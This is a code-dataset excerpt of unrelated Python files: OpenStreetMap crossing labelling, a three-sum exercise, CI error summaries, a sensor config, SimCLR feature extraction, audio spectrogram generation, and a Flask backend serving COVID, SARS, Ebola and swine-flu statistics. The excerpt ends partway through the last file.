node_tags = self.nodeDic[osmid][0]\n if 'crossing' in node_tags.keys():\n print('crossing key in the tag')\n output.write(line + ' ' + '1' + '\\n')\n self.crossing_count += 1\n elif 'highway' in node_tags.keys():\n if 'crossing' == node_tags['highway']:\n print('highway key and crossing value in the tag')\n output.write(line + ' ' + '1' + '\\n')\n self.crossing_count += 1\n else:\n print('this is not a crossing')\n output.write(line + ' ' + '-1' + '\\n')\n\n else:\n print('this is a coords')\n output.write(line + ' ' + '-1' + '\\n')\n else:\n output.write(line + ' ' + '-1' + '\\n')\n\n print(self.crossing_count)\n\n def count_node_in_way(self):\n node_osmid_dic = {} #{osmid:count,...)\n for osmid, (tags, refs) in self.wayDic.items():\n for node_osmid in refs:\n if node_osmid not in node_osmid_dic:\n node_osmid_dic[node_osmid] = 1\n else:\n node_osmid_dic[node_osmid] += 1\n\n for osmid, count in node_osmid_dic.items():\n if count > 6:\n print(osmid)\n\n\n\n def ways(self, ways):\n # callback method for ways\n for osmid, tags, refs in ways:\n if 'highway' in tags:\n self.wayDic[osmid] = (tags, refs)\n # self.wayDic[osmid] = (tag, refs)\n\n def nodes(self, nodes):\n # callback method for nodes\n for osmid, tags, coordinary in nodes:\n self.nodeDic[osmid] = (tags, coordinary)\n\n def coords(self, coords):\n # callback method for coords\n for osmid, lat, lon in coords:\n self.coordDic[osmid] = (lat, lon)\n\n def relations(self, relations):\n # callback method for relations\n for osmid, tags, refs in relations:\n self.relationDic[osmid] = (tags, refs)\n\n\n# instantiate counter and parser and start parsing Proto ways\ncounter = OSMCounter()\np = OSMParser(concurrency=4, ways_callback=counter.ways, nodes_callback=counter.nodes,\n coords_callback=counter.coords, relations_callback=counter.relations)\np.parse('Porto.osm.pbf')\n\nf_input = open(r'dataset/deepwalk_highway_64d.embeddings', 'r')\nf_output = open(r'dataset/deepwalk_highway_64d_labeled.embeddings', 'w+')\n\ncounter.prepare_classify_data(f_input, f_output)\ncounter.count_node_in_way()\n\nf_input.close()\nf_output.close()\n","repo_name":"Leo-Bright/OSMparser","sub_path":"tools/prepare_to_classify.py","file_name":"prepare_to_classify.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26421740657","text":"class pro():\n def three_sum_zero(self,n,l):\n size=n\n lst=l\n new_lst=[]\n for i in range(size-2):\n for j in range(i+1,size-1):\n for k in range(j+1,size):\n if lst[i]!=lst[j] and lst[j]!=lst[k] and lst[i]!=lst[k]:\n if lst[i]+lst[j]+lst[k]==0:\n new_lst.append([lst[i],lst[j],lst[k]])\n return new_lst\n\nn=int(input(\"enter size of list : \"))\nx=[]\nprint(\"enter {} numbers : \".format(n))\nfor i in range(n):\n temp=int(input())\n x.append(temp)\nprint(\"entered list : \")\nprint(x)\nprint()\na=pro()\nnew_lst=a.three_sum_zero(n,x)\nprint(\"after execution new list : \")\nprint(new_lst)","repo_name":"Deep455/Python-programs-ITW1","sub_path":"python_assignment_4/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5106971513","text":"#!/usr/bin/env python\n\n# This script summarizes the error stats from the error table\n\nfrom __future__ import print_function\nimport sys\nimport json\nimport argparse\nimport hashlib\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import desc\nfrom data_models import Base, Job, Error\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"config\", help=\"The JSON config file to load.\")\nargs = parser.parse_args()\n\nconfig = {}\n\nwith open(args.config, 'r') as f:\n config = json.load(f)\n\nif not config.has_key('repos') or not config.has_key('database-url'):\n print(\"Error parsing config file!\")\n print(config)\n sys.exit(1)\n\nengine = create_engine(config['database-url'])\nSession = sessionmaker()\nSession.configure(bind=engine)\nsession = Session()\n\nfor repo in config['repos']:\n if not repo.has_key('path') or not repo.has_key('highlight-branches'):\n print(\"A repo entry is missing needed keys!\")\n print(repo)\n sys.exit(1)\n\n if repo.has_key('hash'):\n hash_id = repo['hash']\n else:\n hash_id = hashlib.md5(repo['path']).hexdigest()\n header = \"REPO : {0}, HASH: {1}\".format(repo['path'], hash_id)\n print(\"-\" * len(header))\n print(header)\n print(\"-\" * len(header))\n q = session.query(Error).filter(Error.repo_hash == hash_id)\n q = q.order_by(desc(Error.count))\n results = q.all()\n\n print(\" NUM_ERRORS\\tSTEP\")\n for result in results:\n print(\" {0}\\t\\t{1}\".format(result.count, result.step))\n\n print()\n","repo_name":"criswell/circle-stats","sub_path":"error-summarize.py","file_name":"error-summarize.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"10839557823","text":"# -*- coding: utf8 -*-\n\nFAKE_MODE = True\n\nTWITTER_ON = False\n\nLOW_LIGHT = False\n\nTAKE_PHOTO = False\n\nTWITTER_ACCOUNT = 'LaVieDePoule'\nTWITTER_ADMIN_ACCOUNT = 'hugokernel'\n\n'''\nAlert config (min, max)\n'''\nVOLTAGE_ALERT = (10, 16)\nCURRENT_ALERT = (0.15, 0.55)\nTEMP_ALERT = (-2, 37)\n\nVALID_BATT_VOLTAGE = (11.2, 12.9)\n\n'''\nOne wire sensor id\n'''\nONEWIRE_SENSOR0 = '28-000006a093e4' # Nid 2\nONEWIRE_SENSOR1 = '28-000006a087ef' # Nid 1\nONEWIRE_SENSOR2 = '28-0000061496ff' # Extérieur\n\nONEWIRE_SENSORS = [ ONEWIRE_SENSOR0, ONEWIRE_SENSOR1, ONEWIRE_SENSOR2 ]\n\n'''\nSensor max age\nValidity of sensor data\n'''\nMAX_AGE = 5 * 60\n\n'''\nSave to db every x seconds\n'''\nSAVE_TO_DB_EVERY = 60\n\n'''\nWeb server\n'''\nSERVER_ON = True\n\nSERVER_HOST = '127.0.0.1'\nSERVER_PORT = 5678\n\nSCAN_FOR_EGG = False\n\n'''\nDirectory of egg image detection\n'''\nEGG_IMAGE_DIRECTORY = '/home/pi/eggimage/'\n\n","repo_name":"hugokernel/LaVieDePoule","sub_path":"config/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"45"} +{"seq_id":"23079647082","text":"\"\"\"\nsgpu python eval.py /scratch/gobi1/datasets/imagenet -a resnet50-4x -b 32 -s train\n\"\"\"\nimport argparse\nimport os\nimport random\nimport shutil\nimport json\nimport warnings\nimport numpy as np\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nfrom resnet_wider import resnet50x1, resnet50x2, resnet50x4\n\nfrom my_dataset import ImageFolder\nimport ipdb\n\n\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('data', metavar='DIR',\n help='path to dataset')\nparser.add_argument('-a', '--arch', default='resnet50-1x')\nparser.add_argument('-s', '--split', default='train')\nparser.add_argument('-j', '--workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('-b', '--batch-size', default=256, type=int)\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n metavar='LR', help='initial learning rate', dest='lr')\nparser.add_argument('-p', '--print-freq', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\n\nbest_acc1 = 0\n\n\ndef main():\n args = parser.parse_args()\n\n # create model\n if args.arch == 'resnet50-1x':\n model = resnet50x1()\n sd = 'resnet50-1x.pth'\n elif args.arch == 'resnet50-2x':\n model = resnet50x2()\n sd = 'resnet50-2x.pth'\n elif args.arch == 'resnet50-4x':\n model = resnet50x4()\n sd = 'resnet50-4x.pth'\n else:\n raise NotImplementedError\n\n sd = torch.load(sd, map_location='cpu')\n model.load_state_dict(sd['state_dict'])\n model.fc = Identity()\n\n model = torch.nn.DataParallel(model).to('cuda')\n cudnn.benchmark = True\n\n # Data loading code\n valdir = os.path.join(args.data, args.split)\n\n # NOTICE, the original model do not have normalization\n val_loader = torch.utils.data.DataLoader(\n ImageFolder(valdir, transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(256),\n transforms.ToTensor(),\n ]), return_path=True, split=\"1/3\"),\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.workers,\n pin_memory=True)\n\n\n validate(val_loader, model, args)\n\n\ndef validate(val_loader, model, args):\n\n # switch to evaluate mode\n path_arr = []\n output_arr = []\n target_arr = []\n\n model.eval()\n\n with torch.no_grad():\n for i, (paths, images, targets) in tqdm(enumerate(val_loader)):\n\n # compute output\n output = model(images)\n path_arr.extend(paths)\n output_arr.append(output.cpu().numpy())\n target_arr.append(targets.cpu().numpy())\n if i % 100 == 0:\n print(\"{}/{}\".format(i, len(val_loader)))\n\n\n path_arr = np.array(path_arr)\n output_arr = np.concatenate(output_arr, 0)\n target_arr = np.concatenate(target_arr, 0)\n\n idx = list(val_loader.dataset.idx_to_class.keys())\n idx.sort()\n idx_to_class = np.array([val_loader.dataset.idx_to_class[i] for i in idx])\n np.savez(\"/scratch/gobi2/andrewliao/simclr/simclr-v1-{}-1/3\".format(args.split),\n path=path_arr,\n output=output_arr,\n target=target_arr,\n idx_to_class=idx_to_class)\n\n\nclass Identity(nn.Module):\n def __init__(self):\n super(Identity, self).__init__()\n\n def forward(self, x):\n return x\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewliao11/simclr-converter","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"2133596243","text":"import os\r\n\r\nimport librosa\r\nimport librosa.display\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch\r\nfrom alive_progress import alive_bar\r\n\r\nimport src.data_process.spectrogram_debug as sdbg\r\n\r\ndefault_sample_rate = 44100\r\n\r\ntrack_ext = \".wav\"\r\n\r\n\r\ndef index_to_file_path(dataset_path: str, metadata: pd.DataFrame, index: int) -> str:\r\n \"\"\"\r\n Creates spectrogram for file in the dataset.\r\n :return: Spectrogram\r\n \"\"\"\r\n\r\n # Check if index is valid\r\n if index < 0 or index >= len(metadata):\r\n print(\"Index out of range\")\r\n return \"\"\r\n\r\n # Get row of index\r\n track_id = metadata.iloc[index][\"track_id\"]\r\n\r\n # Convert track_id to folder name\r\n folder_name = str(int(track_id / 1000)).zfill(3)\r\n\r\n # Convert track_id to filename, which is id aligned to 6 \"0\"s + \".wav\"\r\n file_name = str(track_id).zfill(6) + track_ext\r\n\r\n return os.path.join(dataset_path, folder_name, file_name)\r\n\r\n\r\ndef get_signal(file_path: str) -> np.ndarray:\r\n \"\"\"\r\n Loads signal from file.\r\n :return: Signal\r\n \"\"\"\r\n\r\n # Check if file exists\r\n if not os.path.isfile(file_path):\r\n print(\"File does not exist\")\r\n return None\r\n\r\n # Load file\r\n try:\r\n signal, sample_rate = librosa.load(file_path, sr=None)\r\n except RuntimeError:\r\n print(\"Error loading file\")\r\n return None\r\n\r\n return signal\r\n\r\n\r\ndef get_signal_by_index(\r\n dataset_path: str, metadata: pd.DataFrame, index: int\r\n) -> np.ndarray:\r\n \"\"\"\r\n Loads signal from file.\r\n :return: Signal\r\n \"\"\"\r\n\r\n # Generate file path\r\n file_path = index_to_file_path(dataset_path, metadata, index)\r\n\r\n return get_signal(file_path)\r\n\r\n\r\ndef generate_spectrogram(file_path: str, spectro_height: int = 128) -> np.ndarray:\r\n \"\"\"\r\n Creates a spectrogram for the given file.\r\n param file_path: Path to the file\r\n :return: Spectrogram\r\n \"\"\"\r\n\r\n # Check if file exists and has correct extension\r\n if not os.path.isfile(file_path):\r\n print(\"File does not exist\")\r\n return None\r\n\r\n if not file_path.endswith(track_ext):\r\n print(f\"File is not a {track_ext} file\")\r\n return None\r\n\r\n # Load file\r\n signal, sample_rate = librosa.load(file_path, sr=default_sample_rate)\r\n\r\n # Duplicate mono signal to stereo\r\n if signal.shape[0] == 1:\r\n torch.cat([signal, signal])\r\n\r\n # Generate spectrogram data\r\n sgram = librosa.stft(signal)\r\n sgram_mag = np.abs(sgram)\r\n mel_scale_sgram = librosa.feature.melspectrogram(\r\n S=sgram_mag, sr=sample_rate, power=1, n_mels=spectro_height\r\n )\r\n mel_sgram = librosa.amplitude_to_db(mel_scale_sgram, ref=np.min)\r\n\r\n return mel_sgram\r\n\r\n\r\ndef normalize_spectrogram(spectrogram: np.ndarray) -> np.ndarray:\r\n \"\"\"\r\n Normalizes mel dB spectrogram to [-1; 1] range.\r\n :return: Normalized spectrogram\r\n \"\"\"\r\n norm_spectrogram = 2 * librosa.util.normalize(spectrogram) - 1\r\n return norm_spectrogram\r\n\r\n\r\ndef generate_random_spectrogram(\r\n dataset_path: str, metadata: pd.DataFrame\r\n) -> np.ndarray:\r\n \"\"\"\r\n Creates spectrogram for random file in the dataset.\r\n :return: Spectrogram\r\n \"\"\"\r\n\r\n # Randomize track index\r\n random_index = np.random.randint(0, len(metadata))\r\n file_path = index_to_file_path(dataset_path, metadata, random_index)\r\n\r\n return generate_spectrogram(file_path)\r\n\r\n\r\ndef generate_spectrogram_by_index(\r\n dataset_path: str, metadata: pd.DataFrame, index: int\r\n) -> np.ndarray:\r\n \"\"\"\r\n Creates spectrogram for file in the dataset.\r\n :param dataset_path: path to the dataset\r\n :param metadata: metadata of the dataset\r\n :param index: index of the track\r\n :return: Spectrogram\r\n \"\"\"\r\n\r\n # Generate file path from index\r\n file_path = index_to_file_path(dataset_path, metadata, index)\r\n\r\n return generate_spectrogram(file_path)\r\n\r\n\r\ndef generate_all_spectrograms(\r\n dataset_path: str,\r\n metadata: pd.DataFrame,\r\n save_path: str,\r\n normalize: bool,\r\n spectro_height: int = 128,\r\n) -> None:\r\n \"\"\"\r\n Create spectrograms for all files in the dataset and save them to disk\r\n :param dataset_path: path to the dataset\r\n :param metadata: metadata of the dataset\r\n :param save_path: path to save spectrograms\r\n :param normalize: whether to normalize spectrograms\r\n :param spectro_height: height of the spectrogram\r\n \"\"\"\r\n\r\n # Create save path\r\n if not os.path.exists(save_path):\r\n os.makedirs(save_path)\r\n\r\n # Generate and save spectrogram\r\n with alive_bar(\r\n len(metadata), title=f\"Preparing spectrograms for {save_path}\"\r\n ) as bar:\r\n for index in range(len(metadata)):\r\n try:\r\n file_path = index_to_file_path(dataset_path, metadata, index)\r\n spectrogram = generate_spectrogram(file_path, spectro_height)\r\n if normalize:\r\n spectrogram = normalize_spectrogram(spectrogram)\r\n\r\n filename = str(metadata.iloc[index][\"track_id\"])\r\n save_file_path = os.path.join(save_path, filename)\r\n np.save(save_file_path, spectrogram)\r\n except TypeError:\r\n print(f\"Error generating spectrogram for file {index}\")\r\n\r\n bar()\r\n","repo_name":"DominikKwiatkowski/music-genre-recognition","sub_path":"src/data_process/spectrogram_generator.py","file_name":"spectrogram_generator.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"33398683303","text":"import numpy\nfrom sqlalchemy import extract\nfrom json import JSONEncoder\nfrom datetime import datetime, timedelta\nimport json\nfrom sklearn.impute import KNNImputer\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport pandas as pd\nimport numpy as np\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import func, and_\npd.set_option('max_rows', 10)\npd.plotting.register_matplotlib_converters()\n\n# %matplotlib inline\n\n\ncovid_data_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\owid-covid-data.csv\"\nswine_data_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\swine_flu.csv\"\nebola_data_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\ebola.csv\"\nsars_data_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\sars_2003.csv\"\nvaccinations_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\vaccinations.csv\"\ncovid_data = pd.read_csv(covid_data_path)\nswine_data = pd.read_csv(swine_data_path)\nebola_data = pd.read_csv(ebola_data_path)\nsars_data = pd.read_csv(sars_data_path)\nvaccinations_data = pd.read_csv(vaccinations_path)\n\n# Knn Imputer\nnan = np.nan\n\n# Designate the features to become X\nfeatures = ['Deaths']\nX = swine_data[features]\n# Apply KNN imputer\nimputer = KNNImputer(n_neighbors=2, weights=\"uniform\")\nImputedX = imputer.fit_transform(X)\n\n# Convert output to a data frame to show the stats\nimputed_df = pd.DataFrame.from_records(ImputedX)\nimputed_df.columns = features\nimputed_df['Country'] = swine_data['Country']\nimputed_df['Cases'] = swine_data['Cases']\nimputed_df['Update Time'] = swine_data['Update Time']\n\n\ninterested_features = [\n 'iso_code',\n 'continent',\n 'location',\n 'date',\n 'new_cases',\n 'new_deaths',\n 'new_tests',\n 'total_deaths',\n 'total_cases'\n]\nCleaned_SwineFrame = imputed_df\ncovid_data.dropna(subset=[\"continent\"], inplace=True)\ncovid_data.dropna(subset=[\"population\"], inplace=True)\nebola_data.dropna(\n subset=[\"Cumulative no. of confirmed, probable and suspected cases\"], inplace=True)\n\nfor i in covid_data[interested_features].columns:\n if covid_data[i].isna().sum() > 0:\n covid_data[i] = covid_data[i].fillna(value=0)\n\nfor i in covid_data[interested_features].columns:\n if covid_data[i].isna().sum() > 0:\n print(i, covid_data[i].isna().sum())\n\n\n# print('Length of values after missing values handling::::::::::::::::::::::::::::::::::::::::::', len(covid_data))\napp = Flask(__name__)\nCORS(app)\n\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:root@localhost:5432/pandemic_db5'\ndb = SQLAlchemy(app)\n\nnew_vaccinations_data = vaccinations_data[['location', 'date',\n 'daily_vaccinations', 'iso_code']]\nnew_vaccinations_data = new_vaccinations_data.fillna(value=0)\n# print(new_vaccinations_data.isna().sum())\n\n\nclass COVIDENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n iso_code = db.Column(db.String(80))\n continent = db.Column(db.String(80))\n location = db.Column(db.String(80))\n date = db.Column(db.Date)\n new_cases = db.Column(db.Integer)\n new_deaths = db.Column(db.Integer)\n dateTimeStamp = db.Column(db.Integer)\n totalDeaths = db.Column(db.Integer)\n totalCases = db.Column(db.Integer)\n population = db.Column(db.Integer)\n\n def __init__(\n self, iso_code, continent, location, date, new_cases, new_deaths, dateTimeStamp, totalDeaths, totalCases, population\n ):\n self.iso_code = iso_code\n self.continent = continent\n self.location = location\n self.date = date\n self.new_cases = new_cases\n self.new_deaths = new_deaths\n self.dateTimeStamp = dateTimeStamp\n self.totalDeaths = totalDeaths\n self.totalCases = totalCases\n self.population = population\n\n def serialize(self):\n return {\n \"id\": self.id,\n \"deaths\": self.deaths,\n \"confirm\": self.confirm,\n \"date\": str(self.date),\n \"country\": self.country\n }\n\n @staticmethod\n def serialize_list(l):\n return [m.serialize() for m in l]\n\n def __repr__(self):\n return '' % self.name\n\n\nclass SWINEENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n confirm = db.Column(db.Integer)\n deaths = db.Column(db.Integer)\n country = db.Column(db.String(80))\n date = db.Column(db.Date)\n\n def __init__(self, confirm, deaths, country, date):\n self.confirm = confirm\n self.deaths = deaths\n self.country = country\n self.date = date\n\n def __repr__(self):\n return '' % self.name\n\n\nclass EBOLAENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n confirm = db.Column(db.Integer)\n deaths = db.Column(db.Integer)\n country = db.Column(db.String(80))\n date = db.Column(db.Date)\n\n def __init__(self, confirm, deaths, country, date):\n self.confirm = confirm\n self.deaths = deaths\n self.country = country\n self.date = date\n\n def __repr__(self):\n return '' % self.name\n\n\nclass SARSENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n confirm = db.Column(db.Integer)\n deaths = db.Column(db.Integer)\n country = db.Column(db.String(80))\n date = db.Column(db.Date)\n\n def __init__(self, confirm, deaths, country, date):\n self.confirm = confirm\n self.deaths = deaths\n self.country = country\n self.date = date\n\n def __repr__(self):\n return '' % self.name\n\n\nclass VACCINEENTRY(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n daily_vaccinations = db.Column(db.Integer)\n location = db.Column(db.String(80))\n date = db.Column(db.Date)\n iso_code = db.Column(db.String(80))\n\n def __init__(self, daily_vaccinations, location, date, iso_code):\n self.daily_vaccinations = daily_vaccinations\n self.location = location\n self.date = date\n self.iso_code = iso_code\n\n def __repr__(self):\n return '' % self.name\n\n\nclass NumpyArrayEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, numpy.ndarray):\n return obj.tolist()\n return JSONEncoder.default(self, obj)\n\n\n@app.route('/load-adult-data-to-db')\ndef getUser():\n\n covidEntries = []\n swineEntries = []\n ebolaEntries = []\n sarsEntries = []\n vaccEntries = []\n for ind in covid_data.index:\n if datetime.strptime(covid_data['date'][ind], '%Y-%m-%d') >= datetime.strptime('2020-2-24', '%Y-%m-%d'):\n covidEntries.append(\n COVIDENTRY(\n iso_code=str(covid_data['iso_code'][ind]),\n continent=str(covid_data['continent'][ind]),\n location=str(covid_data['location'][ind]),\n new_cases=int(covid_data[\"new_cases\"][ind]),\n new_deaths=int(covid_data[\"new_deaths\"][ind]),\n date=datetime.strptime(\n covid_data['date'][ind], '%Y-%m-%d'),\n totalCases=int(covid_data[\"total_cases\"][ind]),\n totalDeaths=int(covid_data[\"total_deaths\"][ind]),\n population=int(covid_data[\"population\"][ind]),\n dateTimeStamp=datetime.timestamp(\n datetime.strptime(covid_data['date'][ind], '%Y-%m-%d'))\n )\n )\n\n # print(Cleaned_SwineFrame.isna().sum())\n for ind in Cleaned_SwineFrame.index:\n\n swineEntries.append(\n SWINEENTRY(\n country=str(Cleaned_SwineFrame['Country'][ind]),\n confirm=int(Cleaned_SwineFrame['Cases'][ind]),\n deaths=int(Cleaned_SwineFrame['Deaths'][ind]),\n date=datetime.strptime(Cleaned_SwineFrame['Update Time'][ind], '%m/%d/%Y %H:%M'))\n )\n\n for ind in ebola_data.index:\n ebolaEntries.append(\n EBOLAENTRY(\n country=str(ebola_data['Country'][ind]),\n confirm=int(\n ebola_data['Cumulative no. of confirmed, probable and suspected cases'][ind]),\n deaths=int(\n ebola_data['Cumulative no. of confirmed, probable and suspected deaths'][ind]),\n date=datetime.strptime(ebola_data['Date'][ind], '%Y-%m-%d'))\n )\n\n for ind in sars_data.index:\n sarsEntries.append(\n SARSENTRY(\n country=str(sars_data['Country'][ind]),\n confirm=int(\n sars_data['Cumulative number of case(s)'][ind]),\n deaths=int(\n sars_data['Number of deaths'][ind]),\n date=datetime.strptime(sars_data['Date'][ind], '%Y-%m-%d'))\n )\n\n for ind in new_vaccinations_data.index:\n vaccEntries.append(\n VACCINEENTRY(\n location=str(new_vaccinations_data['location'][ind]),\n daily_vaccinations=int(\n new_vaccinations_data['daily_vaccinations'][ind]),\n date=datetime.strptime(\n new_vaccinations_data['date'][ind], '%Y-%m-%d'),\n iso_code=str(new_vaccinations_data['iso_code'][ind])\n )\n )\n\n try:\n db.session.bulk_save_objects(covidEntries)\n db.session.bulk_save_objects(swineEntries)\n db.session.bulk_save_objects(ebolaEntries)\n db.session.bulk_save_objects(sarsEntries)\n db.session.bulk_save_objects(vaccEntries)\n db.session.commit()\n json = {\n 'name': 'Entries Added',\n }\n return jsonify(json)\n except Exception as e:\n return (str(e))\n\n# Countries for Drop Down\n\n\n@ app.route('/get-covid-countries', methods=[\"GET\"])\ndef getCovidCountries():\n try:\n covidentry = COVIDENTRY.query.with_entities(COVIDENTRY.location).filter(\n COVIDENTRY.new_cases > 0).distinct(COVIDENTRY.location)\n countries = []\n for i in covidentry:\n countries.append(i.location)\n # print(len(countries))\n return jsonify({\"countries\": countries})\n except Exception as e:\n return (str(e))\n\n# Countries for Drop Down\n\n\n@ app.route('/get-bar-chart-values', methods=[\"GET\"])\ndef getAreaChartValues():\n try:\n covidentry = COVIDENTRY.query.with_entities(COVIDENTRY.location, func.sum(COVIDENTRY.new_cases).label(\n 'totalConfirm'), func.sum(COVIDENTRY.new_deaths).label('totalDeaths')).group_by(COVIDENTRY.location).all()\n countriesStats = []\n for i in covidentry:\n countriesStats.append({\n \"Country\": i[0],\n \"ConfirmCases\": i[1],\n \"ConfirmDeaths\": i[2]\n })\n return jsonify({\"barStats\": countriesStats})\n except Exception as e:\n return (str(e))\n\n\n@ app.route('/get-bubble-chart-values', methods=[\"GET\"])\ndef getBubbleChartValues():\n try:\n covidentry = COVIDENTRY.query.with_entities(COVIDENTRY.location, COVIDENTRY.continent, func.sum(COVIDENTRY.new_cases).label(\n 'totalConfirm'), func.sum(COVIDENTRY.new_deaths).label('totalDeaths')).group_by(COVIDENTRY.location, COVIDENTRY.continent).all()\n countriesStats = []\n for i in covidentry:\n countriesStats.append({\n \"name\": i[0],\n \"value\": i[2],\n \"Continents\": i[1],\n })\n return jsonify({\"bubbleStats\": countriesStats})\n except Exception as e:\n return (str(e))\n\n\n# API for Time Series Data\n@ app.route('/get-confirm-time-chart-values', methods=[\"GET\"])\ndef getTimeSeriesConfirmedChartValues():\n try:\n covidentry = COVIDENTRY.query.filter_by(**request.args.to_dict()).with_entities(func.sum(COVIDENTRY.new_cases).label(\n 'totalConfirm')).order_by(COVIDENTRY.dateTimeStamp).group_by(COVIDENTRY.dateTimeStamp).all()\n response = []\n for i in covidentry:\n response.append(i[0])\n return jsonify({\"TImeSeriesChart\": response})\n except Exception as e:\n return (str(e))\n\n\n@ app.route('/get-deaths-time-chart-values', methods=[\"GET\"])\ndef getTimeSeriesDeathChartValues():\n try:\n\n covidentry = COVIDENTRY.query.filter_by(**request.args.to_dict()).with_entities(\n func.sum(COVIDENTRY.new_deaths\n ).label('totalDeaths')\n ).order_by(COVIDENTRY.dateTimeStamp\n ).group_by(COVIDENTRY.dateTimeStamp).all()\n\n response = []\n for i in covidentry:\n response.append(i[0])\n return jsonify({\"TImeSeriesChart\": response})\n except Exception as e:\n return (str(e))\n\n\n@ app.route('/get-dashboard-stats-values', methods=[\"GET\"])\ndef getDashboardStatsValues():\n try:\n\n covidentry = COVIDENTRY.query.with_entities(\n COVIDENTRY.location,\n func.max(COVIDENTRY.totalCases).label('totalCasesConfirm'),\n func.max(COVIDENTRY.totalDeaths).label('totalDeathsConfirm'),\n ).order_by(COVIDENTRY.location\n ).group_by(COVIDENTRY.location).all()\n response = []\n for i in covidentry:\n response.append({\n \"Country\": i[0],\n \"ConfirmCases\": i[1],\n \"ConfirmDeaths\": i[2],\n })\n return jsonify({\"barStats\": sorted(response, key=lambda k: k['ConfirmCases'], reverse=True)})\n except Exception as e:\n return (str(e))\n\n# Get Paramters\n\n\n@app.route('/get-combineGraph-values')\ndef getParameter():\n try:\n # func method\n # from sqlalchemy import func\n # Group according to the date of a certain month of a certain year.\n start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n if 'start_date' in request.args.to_dict():\n start_date = datetime.strptime(\n request.args.to_dict()['start_date'], '%Y-%m-%d')\n if 'end_date' in request.args.to_dict():\n end_date = datetime.strptime(\n request.args.to_dict()['end_date'], '%Y-%m-%d')\n\n covidEntries = COVIDENTRY.query.filter(\n COVIDENTRY.location == request.args.to_dict()['country'],\n COVIDENTRY.date >= start_date,\n COVIDENTRY.date <= end_date\n ).with_entities(\n func.max(COVIDENTRY.totalCases),\n func.max(COVIDENTRY.totalDeaths),\n COVIDENTRY.location,\n extract('year', COVIDENTRY.date),\n extract('month', COVIDENTRY.date)\n ).group_by(COVIDENTRY.location, extract('year', COVIDENTRY.date), extract('month', COVIDENTRY.date)\n ).order_by(extract('year', COVIDENTRY.date), extract('month', COVIDENTRY.date)).all()\n response = []\n for i in covidEntries:\n\n response.append({\n \"Cases\": i[0],\n \"Deaths\": i[1],\n \"Country\": i[2],\n \"Year\": i[3],\n \"month\": i[4],\n })\n\n return jsonify({'combineGraph': response})\n except Exception as e:\n return (str(e))\n\n\n# Countries Comparison API\n@app.route('/get-countries-compared-data', methods=[\"GET\"])\ndef get_comparison_results():\n try:\n start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n if 'start_date' in request.args.to_dict():\n start_date = datetime.strptime(\n request.args.to_dict()['start_date'], '%Y-%m-%d')\n if 'end_date' in request.args.to_dict():\n end_date = datetime.strptime(\n request.args.to_dict()['end_date'], '%Y-%m-%d')\n\n covidEntries = COVIDENTRY.query.filter(\n COVIDENTRY.location.in_(\n [request.args.to_dict()['country1'], request.args.to_dict()['country2']]),\n COVIDENTRY.date >= start_date,\n COVIDENTRY.date <= end_date\n ).with_entities(\n func.max(COVIDENTRY.totalCases),\n func.max(COVIDENTRY.totalDeaths),\n COVIDENTRY.location,\n extract('year', COVIDENTRY.date),\n extract('month', COVIDENTRY.date)\n ).group_by(COVIDENTRY.location, extract('year', COVIDENTRY.date), extract('month', COVIDENTRY.date)\n ).order_by(extract('year', COVIDENTRY.date), extract('month', COVIDENTRY.date)).all()\n # covidentry = COVIDENTRY.query.with_entities(\n # COVIDENTRY.location,\n # COVIDENTRY.population,\n # 